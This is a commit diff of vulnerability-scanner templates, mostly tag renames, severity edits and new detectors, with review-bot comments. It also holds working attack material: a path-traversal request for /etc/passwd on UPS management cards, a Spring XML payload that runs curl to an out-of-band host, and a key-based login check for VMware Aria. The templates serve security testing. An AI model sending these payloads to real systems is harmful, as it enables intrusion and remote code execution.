# digest: 4a0a00473045022100ec5ba858cbe1e05e3174848d9069a308fe6fc8077ad9cb3e5be3ea5e8941e8ea02205590d97ee522844eceb4ac02f8368d35939a46b86594c2387cac974a52c6ae50:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221009c6175d4b394663b87da93b68f083bbdad28dce54149dfb1290a8d72f43f7a86022100e3c72e653388184addb6bb02348f7f214a0d29d5446b0bc87c4d026860c08b01:922c64590222798bb761d5b6d8e72950


@ -16,7 +16,7 @@ info:
metadata:
verified: true
max-request: 85
tags: misc,defacement,spam,hacktivism,bruteforce
tags: misc,defacement,spam,hacktivism,fuzz
http:
- method: GET
@ -413,4 +413,4 @@ http:
- /frost.txt
- /-.txt
- /!.txt
# digest: 4b0a00483046022100f218ea0fd53ebf337b31b0b7ee9c3dbffec2b02ae4c275a4c933000c18056da2022100c7cfc9b6a0ac0b1ea92a4ae62cab623625d5710beecdf52408211b33d596c21c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a121574bdd704d284d1675f8721914e3c675e5c66a64c266753135d55836c43502206ab7dff5cb3dad67f1cb2e163b6c7d49d464498f2b1195d03bd3629a7a056f1f:922c64590222798bb761d5b6d8e72950


@ -8,7 +8,7 @@ info:
- https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666
metadata:
max-request: 47
tags: miscellaneous,misc,bruteforce,windows
tags: miscellaneous,misc,fuzz,windows
http:
- raw:
@ -82,4 +82,4 @@ http:
- type: kval
kval:
- 'www_authenticate'
# digest: 490a0046304402200998332a900ab3a010afc671de86d7e0dce353842f87b01101f55fc8d3dfa8680220470194bf7c344099f16ae411b214e3f983275e7c5eb172f3d2fb448b8b16921a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205d7dadfbaf6f4fa5ee42494a2c579a1e1e673e8326c6524b66a397b17b38644002210099a781aec9fa8081e77aa23d7f6b6a14046ccd4ef8fd390b6376781f660d71ac:922c64590222798bb761d5b6d8e72950


@ -8,7 +8,7 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,bruteforce,misconfig
tags: aem,misconfig
http:
- method: GET
@ -32,4 +32,4 @@ http:
part: header
words:
- 'application/json'
# digest: 4b0a004830460221009f1fe9c087a47f4eaaa650529a28a4b5b4611e7feaf4501045633287cc9eb2af022100f9fb5b48056e18a956395b5cb8fd9231af85504f7816f4fd0c9b982bc1a52549:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100cafd612968a71e2c99dc57d80e19456e1651f3661fb078df3ffbf5c1e3527aa90221009d782891fce13e73a531815ef5c121a3afa614c8a49be98820317d8f01ff0adb:922c64590222798bb761d5b6d8e72950


@ -9,7 +9,7 @@ info:
metadata:
max-request: 100
shodan-query: http.title:"GitLab"
tags: gitlab,enum,misconfig,bruteforce
tags: gitlab,enum,misconfig,fuzz
http:
- raw:
@ -38,4 +38,4 @@ http:
part: header
words:
- "application/json"
# digest: 490a004630440220562a9f8ba6edfa7b4aee0ee747db5bea2b7a92f48e4880e87f7c2c0e1f0e53350220284a8c20ed6356ee243fe41581351c7cdafc9037099d94a5f34a45813725f77f:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205c9c86f3c046857119bb1a670b24f3214292931dc0fa8f3f2de2a774d270003f0220494fa1162786a29761083cf667b6d9634363502ffaa72629ab5c9ad4ac70494a:922c64590222798bb761d5b6d8e72950


@ -3,12 +3,12 @@ id: drupal-install
info:
name: Drupal Install
author: NkxxkN
severity: low
severity: high
description: Drupal Install panel exposed.
metadata:
max-request: 2
shodan-query: http.component:"drupal"
tags: exposure,drupal
tags: misconfig,drupal,install,exposure
http:
- method: GET
@ -23,4 +23,4 @@ http:
- type: word
words:
- "<title>Choose language | Drupal</title>"
# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220115cf9e237a9e0e09034a814da536ec254ae826df2023819714ad7677814606102207ecda93edc69d914ee07bed7be0c76fcae80cd410e6a511552cd3686c8e6e785:922c64590222798bb761d5b6d8e72950
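Review bot: The severity in the first hunk appears to move from `low` to `high` (the page prints both values without markers, so this reads the second as the new one), but `description` still says only `Drupal Install panel exposed.`. That gives a triager no basis for the higher rating. A sentence on impact would justify it, for example `description: Drupal installer is reachable, which suggests an unconfigured site that any visitor could set up.`. The only matcher visible in the second hunk is the page title, and the matcher list starts outside the hunk, so it is worth confirming that a status check accompanies it now that hits are rated high.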


@ -16,7 +16,7 @@ info:
cwe-id: CWE-441
metadata:
max-request: 25
tags: exposure,config,proxy,misconfig,bruteforce
tags: exposure,config,proxy,misconfig,fuzz
http:
- raw:
@ -135,4 +135,4 @@ http:
- (!contains(body_1, "ssh")) && ((contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh"))
- (!contains(body_1, "SSH")) && ((contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, "SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH"))
condition: or
# digest: 4b0a004830460221009f48b01f26136702795a2cffb7b6b7816d70dea40d4ab51925b3e3bf0c11b6af0221008563de6541e201ff78bf5ab81bf17f7a208c87c839acd797ffe0b201c82f550f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100eb06c1baf9b355cae11480ca66689b197c6d0fe975d34a9e5cf6c0a7ce2db424022100de87b67ae05bd14e68e9ff47470c1726b431bafbb4f67c5c9dd7b6b4d93c1456:922c64590222798bb761d5b6d8e72950


@ -16,7 +16,7 @@ info:
cwe-id: CWE-441
metadata:
max-request: 6
tags: exposure,config,proxy,misconfig,bruteforce
tags: exposure,config,proxy,misconfig,fuzz
http:
- raw:
@ -60,4 +60,4 @@ http:
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
- (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works"))
# digest: 4a0a00473045022050f32d433907eb641719e6b7b39ff4bb5fbcf7f2001078134c78c7c7eb85058f0221009485e32b4f5ae470fb7df0b41a812d9f95bc1be46caa1c5a0979f2779bcc299e:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204a69f7542ff2a50a4165edd9f554e7c7c52121f127a95bcb8f97c86b4affaf7c0220716d16b16fa8d641d6645b0bc6d82b3b3a5be1554d8b650f469656640b38ee7f:922c64590222798bb761d5b6d8e72950
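Review bot: The first two `dsl` entries visible at old line 60 are identical as rendered. Both test `"Welcome to Windows"` against body_1 through body_6, so one of them adds nothing to the match. If the second was meant to look for a different banner string or a different set of response bodies, it should be corrected; otherwise one copy can be dropped. The matcher list and its `condition` start outside this hunk, so the remaining entries are not visible here.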


@ -16,7 +16,7 @@ info:
cwe-id: CWE-441
metadata:
max-request: 8
tags: exposure,config,proxy,misconfig,bruteforce
tags: exposure,config,proxy,misconfig,fuzz
http:
- raw:
@ -61,4 +61,4 @@ http:
- (!regex("(?i)SSH-[.]+-+",body_1)) && (!regex("(?i)SSH-[.]+-+",body_2)) && (regex("(?i)SSH-[.]+-+",body_4))
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6))
- (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8)))
# digest: 4a0a0047304502210081f5f214233f6f6cf91e16579381ca30fc0ce8dcf65f0a90f70a1e8d06d24d84022078ceab298b767ed7830bd6f6b69ea8c510687cc8937183784815309cc9cbb294:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ea2fb3ebd78e1c5f154da5c2752dc9b4c3072b6969bbd2eb1e471d806a1e587502205b65830d95619ed72f037ad2ab405b591674b9feb52e35a4d44a6cb84db66ddb:922c64590222798bb761d5b6d8e72950
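Review bot: The SSH expression in the matcher at old line 61, `regex("(?i)SSH-[.]+-+",body_4)`, can only match `SSH-` followed by literal dots, because `.` inside a character class is not a wildcard. A banner of the usual `SSH-2.0-…` form would not satisfy it, so this branch likely never fires and the template under-reports. Something like `regex("(?i)SSH-[0-9.]+-",body_4)`, with the same pattern in the two negated checks on body_1 and body_2, expresses the apparent intent. The matcher list begins outside the hunk.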


@ -0,0 +1,28 @@
id: directus-detect
info:
name: Directus - Detect
author: ricardomaia
severity: info
description: |
Directus is a content manager with dynamic access API generation and transparent integration with the main databases.
reference:
- https://directus.io/
metadata:
max-request: 1
google-query: 'X-Powered-By: Directus'
verified: true
tags: tech,directus,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "X-Powered-By: Directus"
case-insensitive: true
# digest: 490a004630440220479c02cfe34e7b2c20a1a976a14a53f0b1aafded106d55d08b9805cd3715425c02202a6fb91a2289a5fae5ff1ce56b8fef09bfcec164a5546e1ad4a8145584d5212b:922c64590222798bb761d5b6d8e72950
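Review bot: The `google-query` value under `metadata` is a response-header string (`X-Powered-By: Directus`), which a web search engine does not index, so the key as written is unlikely to help anyone locate instances. A header-based query fits a banner-search key such as `shodan-query`, once it has been verified to return results. The `description` also describes the product rather than the finding; a line such as `Directus was detected from the X-Powered-By response header.` tells a reader of the scan output what was actually observed.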


@ -11417,6 +11417,7 @@ http:
name: softether-vpn
words:
- <li>manage this vpn server or vpn bridge<ul>
case-insensitive: true
- type: word
name: softnext-spam
@ -15064,4 +15065,4 @@ http:
words:
- "x-dispatcher:"
case-insensitive: true
# digest: 4a0a00473045022100e202b5b8367df139a20f5ff3fced4c3ec57f5c5c98c2c42e3079952ccc4cf87502204d5331301337b21ea90535286f9393bc4140b0fde578aef1869201af8fca701e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100bc94744c796eb79eba218d1c041ec0e817654420bfc1a1c188d90dcfc8506dcc0221008763af93a66376ac9b4dbee14f6d8a1db56f84bfc29474faefd0f50ffd68ea6b:922c64590222798bb761d5b6d8e72950


@ -13,7 +13,7 @@ info:
verified: true
max-request: 50
shodan-query: Graylog
tags: tech,graylog,api,swagger,bruteforce
tags: tech,graylog,api,swagger,fuzz
http:
- method: GET
@ -88,4 +88,4 @@ http:
- "status_code == 401"
- "contains(header, 'X-Graylog-Node-Id') || contains(header, 'Graylog Server')"
condition: and
# digest: 490a0046304402205f8ec88c8c872e1f72f827d27f188fb5cf33790e02129f8c031dcf388ae2267302206b1141795fc1f4b771b9f166252c932adacbd6f72f94e352eb1e0e392659f9d4:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100cfdfa42b1d6eceea7948a44eebd55448c0553992200628d09080452422232dd7022100a11fdf4e1c293d3669c0923ed6177f2192e0ac22ff1af23651878299747ad7e4:922c64590222798bb761d5b6d8e72950


@ -9,11 +9,14 @@ info:
max-request: 1
tags: tech,microsoft,iis
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 4
matchers-condition: and
matchers:
- type: word
@ -21,14 +24,9 @@ http:
words:
- "IIS"
- type: status
status:
- 200
extractors:
- type: kval
part: header
kval:
- Server
# digest: 490a0046304402204aec8d1c4678a40a8ca831d952b351c4ca885fb845222a559099426e6a27ba9602204f9487670472a494fcecc37f1ebc08e68f6c3007de6fae438c5f5b7210e66a87:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502207a63b4fb5117f7f1168ba477b97deaa35e7e38c9355639a7df7c8f6f54fa960c022100e3d3f3c25ecff01f75a723ca2df3e64e5ea725d7cc61f70ef54e41f6899fc359:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,25 @@
id: wing-ftp-service-detect
info:
name: Wing FTP Service - Detect
author: ritikchaddha
severity: info
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
max-request: 1
verified: true
shodan-query: "Wing FTP Server"
tags: tech,ftp,wing,detect
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Wing FTP Server"
# digest: 4b0a00483046022100c80a28fe09665c71ca345c950405518bec7b02defcbed410c0a59c743e24da46022100bc4ae224a03b1cecc0f9646db3ce15f82e26125b2eb0fd647cd0ba7395be4be9:922c64590222798bb761d5b6d8e72950
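Review bot: The `description` explains what FTP is rather than what this template finds. The request is an HTTP GET to `{{BaseURL}}` and the only matcher looks for `Wing FTP Server` in the response headers, so I would replace the text with `Wing FTP Server was detected from its HTTP response headers.` The word matcher is also case-sensitive, unlike the Directus detector added in the same commit; adding `case-insensitive: true` would make it tolerant of banner casing.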


@ -0,0 +1,38 @@
id: ups-network-lfi
info:
name: UPS Network Management Card 4 Path Traversal
author: Kazgangap
severity: high
description: |
UPS Network Management Card version 4 suffers from a path traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/177626/upsnmc4-traversal.txt
- https://www.exploit-db.com/exploits/51897
metadata:
max-request: 1
verified: true
shodan-query: html:"UPS Network Management Card 4"
tags: ups,lfi
http:
- method: GET
path:
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a00473045022100f89ac4d5fc64a14de49e8cb3c38e50b5639b4232cf5be0590f1bfdc1d4a6984f0220378dff779681382e54be7b3f7a240fff7417804e84cb9fc58c17e2c84cb04e0f:922c64590222798bb761d5b6d8e72950
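Review bot: The `info` block of this `severity: high` template carries no `classification` and no `remediation`, so a finding reaches triage without a weakness id or a next step. I would add `classification:` with `cwe-id: CWE-22`, and a `remediation:` line pointing to the vendor's fixed firmware; the fixed version is not stated on this page, so it should be taken from the advisory. The `tags: ups,lfi` line also has no vendor or product tag, which makes the template harder to select when scoping a scan to a specific device family.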


@ -14,7 +14,7 @@ info:
shodan-query: title:"通达OA"
fofa-query: title="通达OA"
zoomeye-query: app:"通达OA"
tags: tongda,auth-bypass,bruteforce
tags: tongda,auth-bypass,fuzz
http:
- raw:
@ -37,4 +37,4 @@ http:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2,'user_id:') && contains(body_2,'user_name:') && contains(body_2,'var loginUser')"
condition: and
# digest: 490a0046304402204a06da29f8ed74b30b3c4ab83d3cc755122295c433b365b4826bb259ca49790402202ad3e465c123744f61cdbec2d6264a43a222ffa353f4343897a41deecc126215:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100cf6eb6c3146832a9fd31f8913265b52fc3f58057391d7f8f553d6c50c1fd2de002200254175ba248dd65f2ebf2ed5c9337787d304c2c1222925bd65b7b993550cf9b:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,7 @@ info:
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
metadata:
max-request: 276
tags: wordpress,php,xmlrpc,bruteforce
tags: wordpress,php,xmlrpc,fuzz
http:
- raw:
@ -50,4 +50,4 @@ http:
- 'xmlrpc'
- 'isAdmin'
condition: and
# digest: 4a0a0047304502210099e858a727502be5806faf777940504e60eb4ff367ce58779cbd952547018c3502207b54c8f1b32b85f47ed048a7fd956cbbd58a85fdf1895e055b89e9bc1ed0653d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100edfa1eaae603d4a662ebaa0eaddba9894ee90c4bd3431bcaae13280d7e9c2fa5022027b501e990478aaca56cc4162f495540c80217172b1c28e0b1516864f9913ad8:922c64590222798bb761d5b6d8e72950
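Review bot: Replacing `bruteforce` with `fuzz` on the `tags` line removes the only tag that marked this template as a credential-guessing check. The reference is an XML-RPC authentication brute-force write-up and `max-request` is 276, so scan profiles that exclude `bruteforce` to avoid account lockouts would presumably stop excluding it. Either keep both, `tags: wordpress,php,xmlrpc,bruteforce,fuzz`, or state the rename in the commit description so operators can update their include and exclude lists. The same substitution appears in the proxy, Graylog, Tongda, VMware Aria and default-login sections on this page.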


@ -29,7 +29,8 @@ info:
verified: true
vendor: vmware
product: aria_operations_for_networks
tags: js,packetstorm,cve,cve2019,vmware,aria,rce,bruteforce,vrealize
tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize
variables:
keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory
@ -64,4 +65,4 @@ javascript:
- type: dsl
dsl:
- success && response
# digest: 4b0a004830460221009feafd85e7304801a5d27779281ba1e404c8bf1c26f4d8e443ace45603abfd980221009be9e788b356d6cf16aae887e936303bd2c812545e058d765238b4d65fbac6b2:922c64590222798bb761d5b6d8e72950
# digest: 4b0a0048304602210096baa6d7adfe80f8e87172810d28e0fb98afca70b4c7081653717d290b1c455e022100f8f25d688999956d0f6f18c2c522b6946f46e35c415fe928b97369971def3226:922c64590222798bb761d5b6d8e72950
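Review bot: The rewritten `tags` line still carries `cve2019`, while the `keysDir` variable two lines below points at `helpers/payloads/cve-2023-34039-keys`. The template id is outside the hunk, but the year tag looks wrong and would keep the template out of a `cve2023` selection. Since the line is being edited anyway, I would write `tags: js,packetstorm,cve,cve2023,vmware,aria,rce,fuzz,vrealize`.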


@ -40,7 +40,7 @@ javascript:
let b = m2.Buffer();
let name=Host+':'+Port;
let conn = m1.Open('tcp', name);
let randomvar = '{{randstr}}'
let randomvar = '{{randstr}}'.toLowerCase();
var Base64={encode: btoa}
exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
@ -61,4 +61,4 @@ javascript:
- 'contains(interactsh_protocol, "dns")'
- 'contains(interactsh_request, response)'
condition: and
# digest: 4a0a004730450220072242f64d49392155c8bd39d873097b2d61c950543e6aed9e10de3504f6c99202210089c83d599670a33b43a312a55f6ef5dce55b3861aa538160fa40802c06d6a00f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c9d0d2f9b39ad03129d83fcc2561733c1ffdb8119572c0f222d529083466f7b1022100b6db80c8ccd45b35ec5ebafceefbf53d92b365fc01041ad991036346155950c4:922c64590222798bb761d5b6d8e72950


@ -7,7 +7,7 @@ info:
metadata:
max-request: 223
shodan-query: port:1433
tags: js,ssh,default-login,network,bruteforce
tags: js,ssh,default-login,network,fuzz
javascript:
- pre-condition: |
@ -37,4 +37,4 @@ javascript:
- "response == true"
- "success == true"
condition: and
# digest: 4a0a0047304502201075a52fb072b30eaf6d0a90a65cfd28bb977d1e550dea81be5fdf48eb9d4a40022100d71ccf516beef02a23e98f5041349bad1edefa0e3c4d4f83d7a3789ceb5c26e9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022014aa9c1a1b17b3914b4ba3f3233452eebae9a55538d97c0e80eda65e1d207f4d022100bb2595041170eae66cc6dd5fcbf9b33a0b3d61a92fe5a77c1aa48a600f8f420c:922c64590222798bb761d5b6d8e72950
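Review bot: The edited `tags` line keeps `ssh` although the `shodan-query` directly above it is `port:1433`, the default Microsoft SQL Server port rather than an SSH port. The template id and the JavaScript body are outside the hunk, so one of the two values is presumably a copy-paste leftover. If this is the MSSQL default-login check, the line should read `tags: js,mssql,default-login,network,fuzz`; if it is an SSH check, the query should be corrected instead.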


@ -12,7 +12,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
tags: network,mysql,bruteforce,db,misconfig
tags: network,mysql,db,misconfig
tcp:
- host:
@ -23,4 +23,4 @@ tcp:
- type: word
words:
- "mysql_native_password"
# digest: 490a00463044022035dcdfe3a3a04ff5cd925e153aac37f32ffd2ce11c80930db28848f2858ae91c0220477ec8d91cdb25472d209662968dbdfbe66331774355dd1b02db883d28c53906:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220271c76e40a4a3b9020fe8bf117a2f647a67b98bca02aa2eab3cab74bd6853b7c022100f4fb333ac1fd78a79bab65871e12be4c741ce43d3347f9f742029f49033216b1:922c64590222798bb761d5b6d8e72950


@ -11,7 +11,7 @@ info:
cwe-id: CWE-200
metadata:
max-request: 1
tags: network,tidb,bruteforce,db,misconfig
tags: network,tidb,db,misconfig
tcp:
- host:
@ -24,4 +24,4 @@ tcp:
- "mysql_native_password"
- "TiDB"
condition: and
# digest: 4b0a00483046022100e049b1c055324354cc32587bf2b1adb5f41ae71e0470fa51e45ae3c0349605fb02210090caa87661256bffc263735cf58cbc73eadd15af8c05f627baebba0c3c5e5e3e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a0048304602210080382e3d0d64072e7aeb74e7b56c3b9081e554f2ce57ee36b6fe778c39567ffa022100cd086a1912176473d7ec2411f0b8a8b421e8b31f805bc41ae8c37fa2c1cbb3e2:922c64590222798bb761d5b6d8e72950


@ -10,7 +10,7 @@ TOP-10.md:06a54531fef2bfc5ec2fa38485a3e30c247a3132
cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018
cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f
cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734
cloud/enum/azure-vm-cloud-enum.yaml:d40729aac7a1bfc55ceaf617c16a08c78fe9600f
cloud/enum/azure-vm-cloud-enum.yaml:6d9043c907009b2ff6afc6cd09bd35a6d27f6fe9
cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204
cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41
cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4
@ -97,16 +97,16 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
config/README.md:48976bdcd95e99dbc8d6d2a9004df27e0bfa8494
config/bugbounty.yml:d45915281bcb027c5aac65ec0f66fda4c914bd12
config/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f
config/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e
config/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9
config/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418
config/pentest.yml:c7b04a39e2efaf1a5f627da9b49ecf714d927f0e
config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8
config/recommended.yml:eb4d0cb29634218f0279692e8c59fa1906d7148c
config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605
cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4
cves.json:3b21f179e553a113562af785def57c341b663071
cves.json-checksum.txt:e03adc785e821e31dd4936f083dc56fbb0b302df
dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
@ -122,8 +122,11 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58
dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735
dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656
dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87
dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b
dns/spf-record-detect.yaml:6aad264acb43bab9f128417e59b116cb7b35868e
dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7
dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70
dns/txt-service-detect.yaml:c331256e50faf2211d80f1f973f42c748d86a5d1
dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259
file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891
file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8
@ -973,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf
http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f
http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92
http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923
http/cves/2012/CVE-2012-4253.yaml:8191f7e69d1dbec2c0b9ea2f687eafa87eeb2214
http/cves/2012/CVE-2012-4253.yaml:22bb780ede0f6ee252aa15a98a2b1c8d437494e4
http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841
http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5
http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7
@ -1199,7 +1202,7 @@ http/cves/2017/CVE-2017-16894.yaml:0c7f7d0bdb16cdff6e7a380ba56208eb1ca9d6e6
http/cves/2017/CVE-2017-17043.yaml:b45105c0de0d90d61a79191de73976e9cd4fb790
http/cves/2017/CVE-2017-17059.yaml:d40f8c2b908798457c9b02fa98a480b8bc0a7215
http/cves/2017/CVE-2017-17451.yaml:04b0b3fec8b256c76cef8ea892836c2e420878b8
http/cves/2017/CVE-2017-17562.yaml:d3e0e64e607cfaaace054ae2b40fd4b792f19b92
http/cves/2017/CVE-2017-17562.yaml:2e22c184cd57f7425fba3827242a122c39dc86e8
http/cves/2017/CVE-2017-17731.yaml:1666574cd4dfc7a3995867c7c4b621b267b885ff
http/cves/2017/CVE-2017-17736.yaml:877434782e6a2c5b3095498877a022c3551b6ca8
http/cves/2017/CVE-2017-18024.yaml:6b154b9615599e11764e703081eca6329935ee5e
@ -1496,7 +1499,7 @@ http/cves/2019/CVE-2019-16932.yaml:182fef4932dc7931c45cd3d7aebdaeef9ded81e8
http/cves/2019/CVE-2019-16996.yaml:ad524a9c60b54d610e8c55acaa46e4958a9b8dce
http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940
http/cves/2019/CVE-2019-17270.yaml:8f282f5849f13dda11bbb8837079bb223d9687fb
http/cves/2019/CVE-2019-17382.yaml:8b758f47cbcdde1a0409b679b261ccf5fcbd7d50
http/cves/2019/CVE-2019-17382.yaml:f76bdf75f84fdcae6c031cc28c3420d8dc40f808
http/cves/2019/CVE-2019-17418.yaml:dbeea758a5b8de4c18d2d8790798711113d69195
http/cves/2019/CVE-2019-17444.yaml:7b94376c34d962236141cba63543376257005654
http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671
@ -2398,7 +2401,7 @@ http/cves/2022/CVE-2022-1933.yaml:97c269db3367ffd56494243b090e307b4eb0b586
http/cves/2022/CVE-2022-1937.yaml:f888a42c920fb30ae5b563bf642af334cd97da95
http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d
http/cves/2022/CVE-2022-1952.yaml:4c4d64ceb64295942d0d9c2c1ae79a9bc6a16ee7
http/cves/2022/CVE-2022-2034.yaml:a56290dfd329c3ac92bf63ca31f9a8ccfafd7386
